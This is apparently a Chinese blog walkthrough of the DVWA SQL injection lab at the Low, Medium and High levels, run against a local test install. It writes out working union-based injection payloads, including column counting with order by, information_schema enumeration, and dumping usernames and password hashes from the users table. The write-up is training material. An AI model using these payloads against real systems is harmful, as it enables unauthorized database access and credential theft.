SQL注入漏洞

DVWA

SQL Injection

LOW

1、输入User ID显示对应的name,并且输入的ID值在URL栏中

2、猜测 可能通过ID值带入数据库中进行查询,判断是否存在注入

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 and 1=2 &Submit=Submit#

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' &Submit=Submit#

image-20221027094638825

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' -- qwe &Submit=Submit#

image-20221027094658750

发现存在注入点,且单引号闭合

3、判断字段数,order by 5【使用二分法】

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5 -- qwe &Submit=Submit#

image-20221027094755228

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 3 -- qwe &Submit=Submit#

image-20221027094810517

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2 -- qwe &Submit=Submit#

image-20221027094834673

字段数为2

4、联合注入,观测显示位【回显点】

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select 1,2 -- qwe &Submit=Submit#

image-20221027095013012

5、查看当前数据库的版本号,及当前数据库名

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),database() -- qwe &Submit=Submit#

image-20221027095233603

6、输出当前数据库下的所有表名

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe &Submit=Submit#

image-20221027095415721

7、查询users表下面的所有字段名

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select version(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- qwe &Submit=Submit#

image-20221027095515827

8、查询users 表中的user、password字段数据

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select user,password from users limit 0,1 -- qwe &Submit=Submit#

image-20221027095650944

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=12313' union select user,password from users limit 3,1 -- qwe &Submit=Submit#

image-20221027095714434

Medium

1、选择不同的ID显示对应的name,并且没有在URL中传参

image-20221027095842718

2、猜测是否通过POST猜测,对当前页面抓包

抓取到传参1的数据包

image-20221027100522167

将当前数据库发送到repeater模块中,进行重发包

image-20221027100658718

将id修改为4

image-20221027100725421

3、判断是否存在注入

image-20221027100804417

数字型注入

image-20221027100813219

4、判断字段数 order by

image-20221027100934945

字段数为2

image-20221027100944912

5、联合注入判断回显点

image-20221027101033417

6、判断当前数据库版本号

image-20221027101151588

7、查询当前数据库下所有的表名

image-20221027101336478

8、查询users表下面的所有字段名

image-20221027101505112

语法错误,猜测是否单引号的问题呢,由于MySQL默认支持16进制编解码,故对users进行16进制编码

image-20221027101702145

9、查询users表中的user和password字段数据

image-20221027101822011

High

1、当访问页面时,发现通过一个链接才能修改对应的ID

image-20221027102157284

2、点击链接,传参

image-20221027102220982

image-20221027102239387

3、判断是否存在注入点

image-20221027102318067

单引号闭合

image-20221027102331984

4、判断字段数, order by

1' order by 3 -- qwe

image-20221027102514681

1' order by 2 -- qwe

image-20221027102530141

5、观察显示位

1' union select 1,2-- qwe

image-20221027102631147

6、输出当前数据库版本号,当前数据库名

123' union select version(),database()-- qwe

image-20221027102726859

7、查询当前数据库下的所有表名

123' union select version(),group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe

image-20221027102904310

8、查询users表下的所有字段数

123' union select version(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- qwe

image-20221027103043057

9、查询users表中的user和password字段

123' union select user,password from users limit 0,1 -- qwe

image-20221027103242982

posted @ 2025-07-16 12:31  长温不喜风云  阅读(19)  评论(0)    收藏  举报